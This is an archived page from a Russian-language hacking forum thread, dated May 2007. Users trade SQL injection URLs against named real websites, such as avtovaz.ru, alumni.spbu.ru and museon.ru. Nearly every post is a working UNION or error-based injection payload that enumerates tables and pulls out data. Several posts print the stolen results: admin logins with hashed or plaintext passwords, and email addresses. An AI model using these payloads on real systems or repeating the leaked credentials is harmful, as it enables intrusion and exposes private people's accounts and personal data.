ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2221  
Старый 17.05.2007, 17:18
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от ЛифчиС5СВ  
http://doska.911.by
Код:
http://doska.911.by/full_info.php?sid=-1+union+select+1/*
Код:
http://doska.911.by/full_info.php?sid=-1+union+select+convert(concat(version(),char(58),user(),char(58),database())+using+binary)/*
 
Ответить с цитированием

  #2222  
Старый 17.05.2007, 17:25
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.kn.kz/smi.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3/*
Вытянул таблицу с мылом подписчиков:

Код:
http://www.kn.kz/smi.php?id=-1+union+select+1,concat(id,char(58),mail),3+from+subscribe+limit+0,1/*
------------------------------------------------

Код:
http://www.kazakh.ru/talk/mmess.phtml?idt=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9/*
 
Ответить с цитированием

cont
  #2223  
Старый 17.05.2007, 17:32
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow cont

Цитата:
Сообщение от ЛифчиС5СВ
http://doska.911.by
Код:
http://doska.911.by/full_info.php?sid=-1+union+select+1/*
там есть табличка admin и две записи в ней:
Цитата:
http://doska.911.by/full_info.php?sid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,name,pass),0x55),0x55)+from+admin+limit+0,1/*
termit:3c033ccb7c93e00b : derevo
arka:4722ddc90d46fc5a : 1972

Последний раз редактировалось Серенький; 17.05.2007 в 17:36..
 
Ответить с цитированием

sql
  #2224  
Старый 17.05.2007, 18:57
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Наш АвтоВАЗ
http://www.avtovaz.ru/
--> mysql 5
Цитата:
http://www.avtovaz.ru/articles_text.php?id=-41'+union+select+1,2,table_name,4,5,6+from+informa tion_schema.tables/*
список таблиц на одной странице (всего 74 штуки)

и еще
Накопились
Цитата:
http://www.piknik.info/ALBUMS/cd.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7/*
Цитата:
http://www.utamusic.ru/pressa/pressa_detail.php?id=-49+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8,9,0/*
Цитата:
http://www.varvara-fanclub.ru/foto/?id=-18+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5/*
Цитата:
http://www.solntseva.com/biblio_detail.php?id=-13+union+select+1,2,concat_ws(0x3a,user_id,usernam e,user_password,user_email)+from+phpbb_users+limit +1,1/*
2:Tatyana:63060e7ed635a6061ea4bc2dea5d06c7:admin@s olntseva.com
Цитата:
http://www.brilev.ru/news.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7/*
Цитата:
http://www.a-les.ru/klub.php?id=-38+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7,8,9/*
Цитата:
http://www.fondsk.ru/article.php?id=-706+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3/*
Цитата:
http://www.reforma.kz/index.php?ch_id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database()),7,8/*
Цитата:
http://www.fishmarket.ru/popup.php?id=-33+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4,5/*
-- все mysql 4

Последний раз редактировалось Серенький; 17.05.2007 в 19:05..
 
Ответить с цитированием

Выпускники!
  #2225  
Старый 17.05.2007, 19:37
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Выпускники!

Продолжаю тему выпускников!

Сегодня на очереди клуб выпускников
Санкт-Петербургского Государственного Университета /
Ленинградского Государственного Университета им А.А.Жданова.

www.alumni.spbu.ru


База:

Код:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=@@ version--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
system_user: alumni
db_name: ALUMNI

Таблицы:
Код:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN('dtproperties','ALUMNI_HUMOR','ALUMNI_PHOTO','kill_kk','ALUMNI_FACULTETS','ALUMNI_GBO OK','ALUMNI_JOB','ALUMNI_LOGINS', 'ALUMNI_NEWS','ALUMNI_PEOPLE',' ALUMNI_PEOPLE_PHOTOS','FILTER_IP','PartnerClicks',' Partners','sysconstraints','syssegments'))--
Интересная таблица ALUMNI_LOGINS, ее столбцы:
Код:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ALUMNI_LOGINS'+AND+COLUMN _NAME+NOT+IN('Code','Lname','FulName','Email','Description ','psw'))--
Вытащил только две записи, похоже админы
Код:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+cast(Code+as+nvarchar)%2B%27%3A%27%2Bcast(FulName+as+nvarchar)%2B%27%3A%27%2Bcast(psw+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nvarchar)+FROM+ALUMNI_LOGINS+WHERE+CODE=1)--
1: Nikolay Nikolskiy : soldat88 : nik@tepkom.ru
2: Maxim Kartashev : unknown : perez@tepkom.ru

Интресная вторая таблица ALUMNI_PEOPLE, тут все пользователи.
Да, кстати не забыли кто там учился?
Конечно ВВП! Ну и на сладенькое:

путин:vvp1975:xxxxxxxx: president@kremlin.ru
а пароль не скажу, жить хочется

Последний раз редактировалось [53x]Shadow; 17.05.2007 в 19:39..
 
Ответить с цитированием

  #2226  
Старый 17.05.2007, 20:54
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию

http://www.freecomplex.com
Код:
http://www.freecomplex.com/browse.php?cat=-9999+union+select+1,2,concat(user(),0x3a,version()),4
 
Ответить с цитированием

  #2227  
Старый 18.05.2007, 12:10
scrat
Постоянный
Регистрация: 08.04.2007
Сообщений: 853
Провел на форуме:
5812656

Репутация: 1540


Отправить сообщение для scrat с помощью ICQ
По умолчанию

http://www.bmx.ru/news.php?pg=1&id=278%60 - сказал админам не реагируют....
 
Ответить с цитированием

  #2228  
Старый 18.05.2007, 20:20
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

http://www.absoluteaudio.ru/servis.phtml?id=-1+union+select+1,database(),3,user(),version()/*
 
Ответить с цитированием

  #2229  
Старый 18.05.2007, 23:34
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

http://www.fkska-rostov.ru/
Цитата:
http://www.fkska-rostov.ru/new.php?id=-286+union+select+1,2,3,4,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,user(),version(),database()),0x55),0 x55),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
 
Ответить с цитированием

  #2230  
Старый 18.05.2007, 23:37
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+81,1/*
Таблиц там 81, нашел более менее интересные:

users:

Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(117,115,101,114,115)+limit+0,1/*
svegak_singers_news:

Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(115,118,101,103,97,107,95,115,105,110,103,101,114,115,95,110,101,119,115)+limit+0,1/*
Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(id,char(58),singerid,char(58),newsid),4,5,6,7,8,9,10,11+from+svegak_singers_news+limit+0,1/*
svegak_subscr_users:


Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(115,118,101,103,97,107,95,115,117,98,115,99,114,95,117,115,101,114,115)+limit+0,1/*
Код:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(u_id,char(58),confirmcode,char(58),confirmcheck,char(58),email),4,5,6,7,8,9,10,11+from+svegak_subscr_users+limit+0,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ